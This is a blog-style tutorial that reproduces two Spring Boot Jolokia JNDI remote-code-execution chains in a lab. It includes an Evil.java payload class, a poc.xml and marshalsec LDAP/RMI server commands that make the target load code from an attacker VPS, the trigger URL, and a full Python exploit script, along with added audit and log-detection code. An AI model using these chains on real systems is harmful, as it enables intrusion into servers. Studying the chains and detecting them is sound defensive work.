Improper configuration of Spring Boot jolokia leads to RCE vulnerability

Disclaimer: This article is for learning and reference only. All resources involved come from the Internet. Do not use them for any illegal purpose; otherwise you bear the consequences yourself, and I assume no legal or joint liability.

Vulnerability 1: jolokia logback JNDI RCE

Environment setup

The vulnerability environment is:
https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce

Load the source code in IDEA and create a Spring Boot run configuration to start the environment.

Once the environment is running, visit the /jolokia endpoint.

Preconditions

The target exposes a /jolokia or /actuator/jolokia endpoint
The target uses the jolokia-core dependency (exact version requirements are not yet known) and the relevant MBeans are present in the environment
The target can reach the attacker's HTTP server (outbound requests to the external network are allowed)
Plain JNDI injection depends on the target JDK version (LDAP remote class loading requires jdk < 6u201/7u191/8u182/11.0.1), but those restrictions can be bypassed in the relevant environments

Steps

1. View existing MBeans

Visit the /jolokia/list endpoint and check whether the response contains the keywords ch.qos.logback.classic.jmx.JMXConfigurator and reloadByURL.

2. Prepare the Java code to be executed

Write the Java class (Evil.java) used to confirm the vulnerability:

public class Evil {
    // The constructor runs as soon as the class is instantiated on the target
    public Evil() throws Exception {
        Runtime.getRuntime().exec("calc.exe");
    }
}

Compile it for an old bytecode level so it loads on older JDKs:

javac -source 1.5 -target 1.5 Evil.java

Then copy the generated Evil.class file to the attacker VPS.

3. Host the XML file

Write poc.xml and place it in the same directory as Evil.class on the VPS:

<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/aaabbb" as="appName" />
</configuration>

In the directory containing poc.xml, start a simple HTTP server with Python:

python3 -m http.server 8080

4. Start the malicious LDAP service

Download marshalsec (https://github.com/mbechler/marshalsec) and start the LDAP reference server with the following command:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:8080/#Evil 1389

5. Replace your-vps-ip with the actual address and request the following URL to trigger the vulnerability (the !/ sequences are Jolokia's escaping for a slash inside a path segment):

/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/poc.xml

If the exploit succeeds, the calculator pops up on the target.

Vulnerability 2: jolokia Realm JNDI RCE

This vulnerability uses the same environment as vulnerability 1.

Preconditions

The target exposes a /jolokia or /actuator/jolokia endpoint
The target uses the jolokia-core dependency (exact version requirements are not yet known) and the relevant MBeans are present in the environment
The target can reach the attacker's server (outbound requests to the Internet are allowed)
Plain JNDI injection depends on the target JDK version (RMI remote class loading requires jdk < 6u141/7u131/8u121), but those restrictions can be bypassed in the relevant environments

Steps

1. View existing MBeans

Visit the /jolokia/list endpoint and check whether the response contains the keywords type=MBeanFactory and createJNDIRealm.
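Step 1 of both vulnerabilities is the same check: look in the /jolokia/list output for a specific MBean and operation pair. The Python below is an added example (not from the original post or from the SpringBootVulExploit repository) that automates that audit over the raw list JSON so the same check can be run against your own instances; the response excerpt is constructed, and the nesting it assumes (value -> domain -> key properties -> op/attr) is the layout Jolokia's list response uses.

```python
import json

# (object-name domain, key-property substring, operation): the two JMX
# operations this write-up shows being reached through /jolokia/exec.
DANGEROUS_OPS = {
    ("ch.qos.logback.classic", "JMXConfigurator", "reloadByURL"),
    ("Tomcat", "type=MBeanFactory", "createJNDIRealm"),
}

# Constructed excerpt of a /jolokia/list response (not captured from a real host).
SAMPLE_LIST = json.dumps({
    "request": {"type": "list"},
    "value": {
        "ch.qos.logback.classic": {
            "Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator": {
                "op": {"reloadByURL": {"args": [{"name": "p1", "type": "java.net.URL"}], "ret": "void"},
                       "reloadDefaultConfiguration": {"args": [], "ret": "void"}},
                "attr": {"LoggerList": {"type": "java.util.List", "rw": False}},
            }
        },
        "Tomcat": {
            "type=MBeanFactory": {
                "op": {"createJNDIRealm": {"args": [{"name": "p1", "type": "java.lang.String"}],
                                           "ret": "java.lang.String"},
                       # an overloaded operation is listed as a list of signatures
                       "createStandardHost": [{"args": [], "ret": "void"}, {"args": [], "ret": "void"}]},
            }
        },
        "JMImplementation": {"type=MBeanServerDelegate": {"attr": {"MBeanServerId": {"rw": False}}}},
    },
    "status": 200,
})

def find_dangerous_mbeans(list_response: str) -> list:
    """Return sorted [(object name, operation)] for every exposed operation that
    matches DANGEROUS_OPS, given the raw JSON text of a /jolokia/list response."""
    doc = json.loads(list_response)
    hits = []
    for domain, mbeans in doc.get("value", {}).items():
        for props, info in mbeans.items():
            for op in info.get("op", {}):              # keys are operation names
                for dom, key, bad_op in DANGEROUS_OPS:
                    if domain == dom and key in props and op == bad_op:
                        hits.append((f"{domain}:{props}", op))
    return sorted(hits)

if __name__ == "__main__":
    for name, op in find_dangerous_mbeans(SAMPLE_LIST):
        print(f"EXPOSED: {name} -> {op}")
```

An empty result means neither chain has its required MBean reachable through this endpoint; a non-empty one means the endpoint itself should be restricted, since the operations cannot be removed from the MBeans.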

2. Prepare the Java code to be executed

This step is the same as in vulnerability 1 and is not repeated here.

3. Host the class file

In the directory containing Evil.class on the VPS, start a simple HTTP server:

python3 -m http.server 8080

4. Start the malicious RMI service

Download marshalsec (https://github.com/mbechler/marshalsec) and start the RMI reference server with the following command:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:8080/#Evil 1389

5. Send malicious payload

Adjust the target address, RMI address, port and other details in the springboot-realm-jndi-rce.py script to match your setup, then run it from a server you control.

#!/usr/bin/env python3
# coding: utf-8
# Reference: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt

import requests

# Jolokia endpoint of the target (adjust host and port)
url = 'http://192.168.8.14:9094/jolokia'

# 1. Ask Tomcat's MBeanFactory to create a JNDIRealm under the Engine
create_realm = {
    "mbean": "Tomcat:type=MBeanFactory",
    "type": "EXEC",
    "operation": "createJNDIRealm",
    "arguments": ["Tomcat:type=Engine"]
}

# 2. Set the realm's JNDI context factory to the RMI registry factory
write_factory = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "contextFactory",
    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}

# 3. Point the realm's connection URL at the RMI service started in step 4 (adjust address and port)
write_url = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "connectionURL",
    "value": "rmi://192.168.10.171:1389/Evil"
}

# 4. Stop and start the realm so it reconnects using the new settings
stop = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "stop",
    "arguments": []
}

start = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "start",
    "arguments": []
}

flow = [create_realm, write_factory, write_url, stop, start]

# Each step is a single Jolokia POST request with a JSON body
for i in flow:
    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))
    r = requests.post(url, json=i)
    print(r.status_code, r.json())

Run python3 springboot-realm-jndi-rce.py on the VPS.

If the exploit succeeds, a calculator pops up on the target machine.
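Both chains arrive as ordinary Jolokia requests, either a GET with the request encoded in the path (vulnerability 1) or POSTs with a JSON body (vulnerability 2), so the same few MBean targets can be matched at a reverse proxy or over request logs. The Python below is an added detection example and not part of the original post; the request records are constructed, the `!/` and `!!` handling is Jolokia's own path escaping, and the rule list covers only the MBean operations and attributes shown in this article.

```python
import json
from urllib.parse import unquote

def split_jolokia_path(path):
    """Split on '/', honouring Jolokia escaping: '!/' is a literal '/', '!!' a literal '!'."""
    tmp = path.replace("!!", "\0").replace("!/", "\1")   # sentinels: URL paths carry no NUL/SOH
    return [s.replace("\1", "/").replace("\0", "!") for s in tmp.split("/") if s]

def normalize(method, path, body=""):
    """Return [(type, mbean, operation-or-attribute)] for one HTTP request, for both
    styles Jolokia accepts: GET with the request in the path, POST with JSON (single or bulk)."""
    if method == "POST" and body:
        reqs = json.loads(body)
        reqs = reqs if isinstance(reqs, list) else [reqs]
        return [(r.get("type", "").lower(), r.get("mbean", ""),
                 r.get("operation") or r.get("attribute") or "") for r in reqs]
    segs = split_jolokia_path(unquote(path.split("?", 1)[0]))
    if "jolokia" not in segs:
        return []
    rest = segs[segs.index("jolokia") + 1:]
    return [(rest[0].lower(), rest[1], rest[2])] if len(rest) >= 3 else []

RULES = [  # (request type, object-name substring, operation/attribute, finding)
    ("exec", "JMXConfigurator", "reloadByURL", "logback config reloaded from a URL"),
    ("exec", "type=MBeanFactory", "createJNDIRealm", "Tomcat JNDIRealm created via JMX"),
    ("write", "type=Realm", "connectionURL", "Realm connectionURL rewritten"),
]

def detect(records):
    """records: [(method, path, body)] -> [(record index, finding)]."""
    hits = []
    for n, (method, path, body) in enumerate(records):
        for kind, mbean, op in normalize(method, path, body):
            for rtype, part, target, finding in RULES:
                if kind == rtype and part in mbean and op == target:
                    hits.append((n, finding))
    return hits

# Constructed requests (not captured traffic): a benign list, the vulnerability 1 GET,
# one POST from the vulnerability 2 script, and a benign attribute read.
SAMPLE = [
    ("GET", "/jolokia/list", ""),
    ("GET", "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic"
            ".jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/poc.xml", ""),
    ("POST", "/actuator/jolokia", '{"mbean":"Tomcat:realmPath=/realm0,type=Realm","type":"WRITE",'
             '"attribute":"connectionURL","value":"rmi://your-vps-ip:1389/Evil"}'),
    ("POST", "/jolokia", '{"type":"read","mbean":"java.lang:type=Memory","attribute":"HeapMemoryUsage"}'),
]
```

Because the MBean and operation names are fixed by logback and Tomcat, a hit on any of these rules is high-signal regardless of which host the URL or RMI address points at.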

Tags: Java Back-end Spring Boot

Posted by cool30 on Fri, 17 Mar 2023 10:08:11 +1030